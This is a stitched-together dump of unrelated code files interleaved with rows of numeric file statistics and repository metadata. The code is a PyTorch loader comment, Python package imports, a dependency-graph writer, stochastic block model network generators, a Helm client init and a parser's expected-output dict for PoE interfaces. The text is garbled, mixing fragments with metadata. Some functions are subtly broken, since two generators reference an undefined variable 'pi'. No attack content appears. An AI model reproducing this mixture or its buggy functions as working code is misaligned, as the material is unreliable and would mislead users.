# test_batch_size=256, valid_size=None,
# n_worker=2, resize_scale=0.08, distort_color=None,
# image_size=224, num_replicas=None, rank=None):
#
# norm_mean = [0.47889522, 0.47227842, 0.43047404]
# norm_std = [0.24205776, 0.23828046, 0.25874835]
#
# valid_transform = transforms.Compose([
# transforms.Resize(image_size, interpolation=3), # BICUBIC interpolation
# transforms.ToTensor(),
# transforms.Normalize(norm_mean, norm_std),
# ])
#
# valid_data = torchvision.datasets.ImageFolder(
# save_path + 'test', transform=valid_transform)
#
# self.test = torch.utils.data.DataLoader(
# valid_data, batch_size=test_batch_size, shuffle=False,
# pin_memory=True, num_workers=n_worker)
| 39.669725
| 87
| 0.650324
| 483
| 4,324
| 5.567288
| 0.186335
| 0.053552
| 0.031238
| 0.066939
| 0.864262
| 0.864262
| 0.864262
| 0.864262
| 0.853105
| 0.851246
| 0
| 0.070701
| 0.250925
| 4,324
| 108
| 88
| 40.037037
| 0.759494
| 0.215079
| 0
| 0.847458
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033898
| false
| 0
| 0.050847
| 0
| 0.118644
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e35dfac02da901c4414735877fe62b2200ca011
| 91
|
py
|
Python
|
behavior_circuits/__init__.py
|
behavior-circuits/python_library
|
4b04b8187e642dea345395924e83c39a08228f47
|
[
"MIT"
] | null | null | null |
behavior_circuits/__init__.py
|
behavior-circuits/python_library
|
4b04b8187e642dea345395924e83c39a08228f47
|
[
"MIT"
] | null | null | null |
behavior_circuits/__init__.py
|
behavior-circuits/python_library
|
4b04b8187e642dea345395924e83c39a08228f47
|
[
"MIT"
] | null | null | null |
from behavior_circuits.basic_gates import *
from behavior_circuits.normalizations import *
| 30.333333
| 46
| 0.868132
| 11
| 91
| 6.909091
| 0.636364
| 0.315789
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087912
| 91
| 2
| 47
| 45.5
| 0.915663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1e6aad70c3bec68cdc58b4895e4d5c22a1ed1404
| 5,075
|
py
|
Python
|
magellan/analysis.py
|
ajdegol/magellan
|
f580602df33446317da0f80277c87dc3646c739a
|
[
"MIT"
] | 5
|
2015-09-07T13:00:39.000Z
|
2021-01-18T03:07:51.000Z
|
magellan/analysis.py
|
ajdegol/magellan
|
f580602df33446317da0f80277c87dc3646c739a
|
[
"MIT"
] | 1
|
2015-09-07T12:58:32.000Z
|
2015-09-07T12:58:32.000Z
|
magellan/analysis.py
|
ajdegol/magellan
|
f580602df33446317da0f80277c87dc3646c739a
|
[
"MIT"
] | 2
|
2017-05-21T16:37:12.000Z
|
2018-02-05T14:29:41.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Package contains numerous analysis routines and links to third party libraries
in order to analyse and explore packages for Magellan.
NB: This module is likely to be removed from Magellan in the near future.
"""
def write_dot_graph_to_disk_with_distance_colour(
venv, filename, distances, inc_dist_labels=True):
"""
Create dot graph with colours.
:param Environment venv: virtual env containing nodes and edges
:param str filename: output filename
:param dict distances: (nodes:values) giving values to be used in colouring
:param bool inc_dist_labels=True: include value of distances on node-label
"""
node_template = 'n{}'
node_index = {(venv.nodes[x][0].lower(), venv.nodes[x][1]):
node_template.format(x+1)
for x in range(len(venv.nodes))}
node_index[('root', '0.0.0')] = node_template.format(0)
# Fill in nodes
node_template = ' {0} [label="{1}{2}];\n'
colour_bit_template = '", style=filled, color="{0} {1} {2}"'
dist_lookup = {k[0].lower(): distances[k] for k in distances}
with open(filename, 'wb') as f:
f.write('digraph magout {\n')
# NODES
orig_col_bit = colour_bit_template.format(0.25, 0.25, 0.25)
f.write(node_template.format("n0", "root", orig_col_bit))
max_col = max(distances.values())
if max_col <= 0:
max_col = 1.0
for n in node_index:
n_key = n[0].lower()
if n_key in dist_lookup:
colour_bit = colour_bit_template.format(
str(1-0.5*dist_lookup[n_key]/max_col)[0:5], 1.0, 1.0)
if inc_dist_labels:
colour_bit = ('\n dist: ' + str(dist_lookup[n_key])[0:5]
+ colour_bit)
else:
colour_bit = orig_col_bit
f.write(node_template.format(node_index[n], n, colour_bit))
# EDGES
for e in venv.edges:
from_e = (e[0][0].lower(), e[0][1])
to_e = (e[1][0].lower(), e[1][1])
# print(from_e, to_e, node_index[from_e], node_index[to_e])
try:
f.write(" {0} -> {1};\n"
.format(node_index[from_e], node_index[to_e]))
except KeyError:
pass # don't write node if key error.
f.write('}')
def write_dot_graph_subset(
venv, filename, distances, inc_dist_labels=True):
"""
Create dot graph with colours; truncated to only include those nodes
in "distances"
:param Environment venv: virtual env containing nodes and edges
:param str filename: output filename
:param dict distances: (nodes:values) giving values used in colouring
:param bool inc_dist_labels=True: include value of distances on node-label
"""
dist_lookup = {k[0].lower(): distances[k] for k in distances}
# reduce nodes and edges to only include distances:
node_template = 'n{}'
node_index = {(venv.nodes[x][0].lower(), venv.nodes[x][1]):
node_template.format(x+1)
for x in range(len(venv.nodes))
if venv.nodes[x][0].lower() in dist_lookup}
node_index[('root', '0.0.0')] = node_template.format(0)
edge_index = [e for e in venv.edges if e[0][0].lower() in dist_lookup
and e[1][0].lower() in dist_lookup]
# Templates:
node_template = ' {0} [label="{1}{2}];\n'
colour_bit_template = '", style=filled, color="{0} {1} {2}"'
with open(filename, 'wb') as f:
f.write('digraph magout {\n')
# NODES
orig_col_bit = colour_bit_template.format(0.25, 0.25, 0.25)
f.write(node_template.format("n0", "root", orig_col_bit))
max_col = max(distances.values())
for n in node_index:
n_key = n[0]
if n_key in dist_lookup:
colour_bit = colour_bit_template.format(
str(1-0.5*dist_lookup[n_key]/max_col)[0:5], 1.0, 1.0)
if inc_dist_labels:
colour_bit = ('\n dist: ' + str(dist_lookup[n_key])[0:5]
+ colour_bit)
else:
colour_bit = orig_col_bit
f.write(node_template.format(node_index[n], n, colour_bit))
# EDGES
for e in edge_index:
from_e = (e[0][0].lower(), e[0][1])
to_e = (e[1][0].lower(), e[1][1])
try:
f.write(" {0} -> {1};\n"
.format(node_index[from_e], node_index[to_e]))
except KeyError:
pass # don't write node if key error.
f.write('}')
def print_pdp_tree_parsed(pdp_tree_parsed):
print("pipdeptree nodes:")
for n in pdp_tree_parsed['nodes']:
print(n)
print("pipdeptree deps:")
for n in pdp_tree_parsed['dependencies']:
print('-'*72)
print(n)
for d in pdp_tree_parsed['dependencies'][n]:
print(d)
| 34.060403
| 79
| 0.563547
| 724
| 5,075
| 3.767956
| 0.180939
| 0.052786
| 0.052786
| 0.024927
| 0.804619
| 0.758065
| 0.744135
| 0.744135
| 0.734604
| 0.719208
| 0
| 0.029187
| 0.304631
| 5,075
| 148
| 80
| 34.290541
| 0.743837
| 0.213793
| 0
| 0.752941
| 0
| 0
| 0.081178
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035294
| false
| 0.023529
| 0
| 0
| 0.035294
| 0.082353
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e9151ec3acc9c4bea1f71de4b72ab8e0989a6b1
| 10,030
|
py
|
Python
|
spectral_embedding/network_generation.py
|
iggallagher/Spectral-Embedding
|
d0ce5a277dca239341bfa133e8cd94e8bff7830a
|
[
"MIT"
] | null | null | null |
spectral_embedding/network_generation.py
|
iggallagher/Spectral-Embedding
|
d0ce5a277dca239341bfa133e8cd94e8bff7830a
|
[
"MIT"
] | null | null | null |
spectral_embedding/network_generation.py
|
iggallagher/Spectral-Embedding
|
d0ce5a277dca239341bfa133e8cd94e8bff7830a
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.stats as stats
def symmetrises(A, diag=False):
if diag:
return np.tril(A,0) + np.tril(A,-1).T
else:
return np.tril(A,-1) + np.tril(A,-1).T
def generate_B(K, rho=1):
return symmetrises(rho * stats.uniform.rvs(size=(K,K)), diag=True)
def generate_SBM(n, B, pi):
K = len(pi)
if B.shape[0] != K or B.shape[1] != K:
raise ValueError('B must be a square matrix size K-by-K')
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.bernoulli.rvs(B[Z,:][:,Z]))
return (A, Z)
def generate_MMSBM(n, B, alpha):
K = len(alpha)
if B.shape[0] != K or B.shape[1] != K:
raise ValueError('B must be a square matrix size K-by-K')
Z = stats.dirichlet.rvs(alpha, size=n)
Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
A = symmetrises(stats.bernoulli.rvs(B[Zij,Zij.T]))
return (A, Z)
def generate_DCSBM(n, B, pi, a=1, b=1):
K = len(pi)
if B.shape[0] != K or B.shape[1] != K:
raise ValueError('B must be a square matrix size K-by-K')
W = stats.beta.rvs(size=n, a=a, b=b)
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.bernoulli.rvs(np.outer(W,W) * B[Z,:][:,Z]))
return (A, Z, W)
def generate_WSBM(n, pi, params, distbn):
K = len(pi)
if distbn not in ['beta', 'exponential', 'gamma', 'gaussian', 'poisson']:
raise ValueError('distbn must be beta, exponential, gamma, gaussian or poisson')
if distbn == 'beta':
if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.beta.rvs(a = params[0][Z,:][:,Z], b = params[1][Z,:][:,Z]))
if distbn == 'exponential':
if len(params) != 1 or params[0].shape != (K,K):
raise ValueError('params must be one square matrix size K-by-K [lambdas]')
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.expon.rvs(scale = 1/params[0][Z,:][:,Z]))
if distbn == 'gamma':
if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.gamma.rvs(a = params[0][Z,:][:,Z], scale = 1/params[1][Z,:][:,Z]))
if distbn == 'gaussian':
if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
raise ValueError('params must be two square matrices size K-by-K [means, variances]')
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.norm.rvs(loc = params[0][Z,:][:,Z], scale = np.sqrt(params[1][Z,:][:,Z])))
if distbn == 'poisson':
if len(params) != 1 or params[0].shape != (K,K):
raise ValueError('params must be one square matrix size K-by-K [lambdas]')
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.poisson.rvs(mu = params[0][Z,:][:,Z]))
return (A, Z)
def generate_WMMSBM(n, alpha, params, distbn):
K = len(alpha)
if distbn not in ['beta', 'exponential', 'gamma', 'gaussian', 'poisson']:
raise ValueError('distbn must be beta, exponential, gamma, gaussian or poisson')
if distbn == 'beta':
if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
Z = stats.dirichlet.rvs(alpha, size=n)
Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
A = symmetrises(stats.beta.rvs(a = params[0][Zij,Zij.T], b = params[1][Zij,Zij.T]))
if distbn == 'exponential':
if len(params) != 1 or params[0].shape != (K,K):
raise ValueError('params must be one square matrix size K-by-K [lambdas]')
Z = stats.dirichlet.rvs(alpha, size=n)
Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
A = symmetrises(stats.expon.rvs(scale = 1/params[0][Zij,Zij.T]))
if distbn == 'gamma':
if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
Z = stats.dirichlet.rvs(alpha, size=n)
Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
A = symmetrises(stats.gamma.rvs(a = params[0][Zij,Zij.T], scale = 1/params[1][Zij,Zij.T]))
if distbn == 'gaussian':
if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
raise ValueError('params must be two square matrices size K-by-K [means, variances]')
Z = stats.dirichlet.rvs(alpha, size=n)
Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
A = symmetrises(stats.norm.rvs(loc = params[0][Zij,Zij.T], scale = np.sqrt(params[1][Zij,Zij.T])))
if distbn == 'poisson':
if len(params) != 1 or params[0].shape != (K,K):
raise ValueError('params must be one square matrix size K-by-K [lambdas]')
Z = stats.dirichlet.rvs(alpha, size=n)
Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
A = symmetrises(stats.poisson.rvs(mu = params[0][Zij,Zij.T]))
return (A, Z)
def generate_ZISBM(n, pi, params, distbn, a=1, b=1):
K = len(pi)
if distbn not in ['beta', 'exponential', 'gamma', 'gaussian', 'poisson']:
raise ValueError('distbn must be beta, exponential, gamma, gaussian or poisson')
if distbn == 'beta':
if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
W = stats.beta.rvs(size=n, a=a, b=b)
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.beta.rvs(a = params[0][Z,:][:,Z], b = params[1][Z,:][:,Z]))
ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
if distbn == 'exponential':
if len(params) != 1 or params[0].shape != (K,K):
raise ValueError('params must be one square matrix size K-by-K [lambdas]')
W = stats.beta.rvs(size=n, a=a, b=b)
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.expon.rvs(scale = 1/params[0][Z,:][:,Z]))
ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
if distbn == 'gamma':
if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
W = stats.beta.rvs(size=n, a=a, b=b)
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.gamma.rvs(a = params[0][Z,:][:,Z], scale = 1/params[1][Z,:][:,Z]))
ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
if distbn == 'gaussian':
if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
raise ValueError('params must be two square matrices size K-by-K [means, variances]')
W = stats.beta.rvs(size=n, a=a, b=b)
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.norm.rvs(loc = params[0][Z,:][:,Z], scale = np.sqrt(params[1][Z,:][:,Z])))
ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
if distbn == 'poisson':
if len(params) != 1 or params[0].shape != (K,K):
raise ValueError('params must be one square matrix size K-by-K [lambdas]')
W = stats.beta.rvs(size=n, a=a, b=b)
Z = np.random.choice(range(K), p=pi, size=n)
A = symmetrises(stats.poisson.rvs(mu = params[0][Z,:][:,Z]))
ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
return (A*ZI, Z, W)
def generate_WSBM_zero(n, pi, params, distbn, rho):
(A, Z) = generate_WSBM(n, pi, params, distbn)
W = symmetrises(stats.bernoulli.rvs(rho, size=(n,n)))
return (W*A, Z)
def generate_WMMSBM_zero(n, alpha, params, distbn, rho):
(A, Z) = generate_WMMSBM(n, pi, params, distbn)
W = symmetrises(stats.bernoulli.rvs(rho, size=(n,n)))
return (W*A, Z)
def generate_SBM_dynamic(n, Bs, pi):
K = len(pi)
T = Bs.shape[0]
if Bs.shape[1] != K or Bs.shape[2] != K :
raise ValueError('Bs must be array of T square matrices size K-by-K')
Z = np.random.choice(range(K), p=pi, size=n)
As = np.zeros((T,n,n))
for t in range(T):
As[t] = symmetrises(stats.bernoulli.rvs(Bs[t][Z,:][:,Z]))
return (As, Z)
def generate_MMSBM_dynamic(n, Bs, alpha):
K = len(alpha)
T = Bs.shape[0]
if Bs.shape[1] != K or Bs.shape[2] != K :
raise ValueError('Bs must be array of T square matrices size K-by-K')
Z = np.random.choice(range(K), p=pi, size=n)
As = np.zeros((T,n,n))
for t in range(T):
Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
As[t] = symmetrises(stats.bernoulli.rvs(Bs[t][Zij,Zij.T]))
return (As, Z)
def generate_DCSBM_dynamic(n, Bs, pi):
K = len(pi)
T = Bs.shape[0]
if Bs.shape[1] != K or Bs.shape[2] != K :
raise ValueError('Bs must be array of T square matrices size K-by-K')
W = stats.uniform.rvs(size=n)
Z = np.random.choice(range(K), p=pi, size=n)
As = np.zeros((T,n,n))
for t in range(T):
As[t] = symmetrises(stats.bernoulli.rvs(np.outer(W,W) * Bs[t][Z,:][:,Z]))
return (As, Z, W)
| 39.960159
| 106
| 0.559721
| 1,630
| 10,030
| 3.432515
| 0.053374
| 0.033065
| 0.030027
| 0.07471
| 0.93655
| 0.919571
| 0.896515
| 0.874888
| 0.842359
| 0.838606
| 0
| 0.012507
| 0.258624
| 10,030
| 251
| 107
| 39.960159
| 0.739914
| 0
| 0
| 0.79096
| 0
| 0
| 0.153424
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073446
| false
| 0
| 0.011299
| 0.00565
| 0.163842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ea790bb4b828a20b18eb4f07aa57a4eec9e91b5
| 138
|
py
|
Python
|
kubedriver/helmclient/__init__.py
|
manojn97/kubernetes-driver
|
06f554e7e74927d528bce51807ed52b4a3a77aa4
|
[
"Apache-2.0"
] | 2
|
2021-07-19T07:11:36.000Z
|
2021-08-20T00:42:31.000Z
|
kubedriver/helmclient/__init__.py
|
manojn97/kubernetes-driver
|
06f554e7e74927d528bce51807ed52b4a3a77aa4
|
[
"Apache-2.0"
] | 39
|
2020-08-21T07:39:31.000Z
|
2022-03-21T09:26:08.000Z
|
kubedriver/helmclient/__init__.py
|
manojn97/kubernetes-driver
|
06f554e7e74927d528bce51807ed52b4a3a77aa4
|
[
"Apache-2.0"
] | 11
|
2020-09-29T06:03:50.000Z
|
2022-03-07T06:29:36.000Z
|
from .client import HelmClient
from .tls import HelmTls
from .exceptions import HelmError
from .exceptions import HelmCommandNotFoundError
| 34.5
| 48
| 0.862319
| 16
| 138
| 7.4375
| 0.5625
| 0.235294
| 0.336134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108696
| 138
| 4
| 48
| 34.5
| 0.96748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
94b57cae903b51defa0969f0dfc054f5bfbc43b5
| 14,115
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowPowerInlineUpoePlusModule/cli/equal/golden_output_2_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowPowerInlineUpoePlusModule/cli/equal/golden_output_2_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowPowerInlineUpoePlusModule/cli/equal/golden_output_2_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
expected_output = {
"module": {7: {"available": 8850.0, "used": 2512.8, "remaining": 6337.2}},
"interface": {
"TenGigabitEthernet7/0/1": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.2,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/2": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.2,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/3": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/4": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/5": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.1,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/6": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.2,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/7": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.2,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/8": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/9": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/10": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.2,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/11": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.2,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/12": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/13": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/14": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/15": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.2,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/16": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/17": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.2,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/18": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.2,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/19": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/20": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/21": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/22": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/23": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/24": {
"admin_state": "auto",
"type": "DS",
"operating_state": "on,on",
"allocated_power": 90.0,
"utilized_power": 5.5,
"class": "5,5",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/25": {
"admin_state": "auto",
"type": "SP",
"operating_state": "on",
"allocated_power": 4.0,
"utilized_power": 3.6,
"class": "1",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/26": {
"admin_state": "auto",
"type": "SP",
"operating_state": "on",
"allocated_power": 7.0,
"utilized_power": 6.7,
"class": "2",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/27": {
"admin_state": "auto",
"type": "SP",
"operating_state": "on",
"allocated_power": 15.4,
"utilized_power": 14.5,
"class": "3",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/28": {
"admin_state": "auto",
"type": "SP",
"operating_state": "on",
"allocated_power": 30.0,
"utilized_power": 29.9,
"class": "4",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/29": {
"admin_state": "auto",
"type": "SP",
"operating_state": "on",
"allocated_power": 4.0,
"utilized_power": 3.6,
"class": "1",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/30": {
"admin_state": "auto",
"type": "SP",
"operating_state": "on",
"allocated_power": 7.0,
"utilized_power": 6.7,
"class": "2",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/31": {
"admin_state": "auto",
"type": "SP",
"operating_state": "on",
"allocated_power": 15.4,
"utilized_power": 14.7,
"class": "3",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/32": {
"admin_state": "auto",
"type": "SP",
"operating_state": "on",
"allocated_power": 30.0,
"utilized_power": 29.2,
"class": "4",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/33": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/34": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/35": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/36": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/37": {
"admin_state": "auto",
"type": "SS",
"operating_state": "on,off",
"allocated_power": 30.0,
"utilized_power": 20.4,
"class": "4",
"device": "Ieee PD",
},
"TenGigabitEthernet7/0/38": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/39": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/40": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/41": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/42": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/43": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/44": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/45": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/46": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
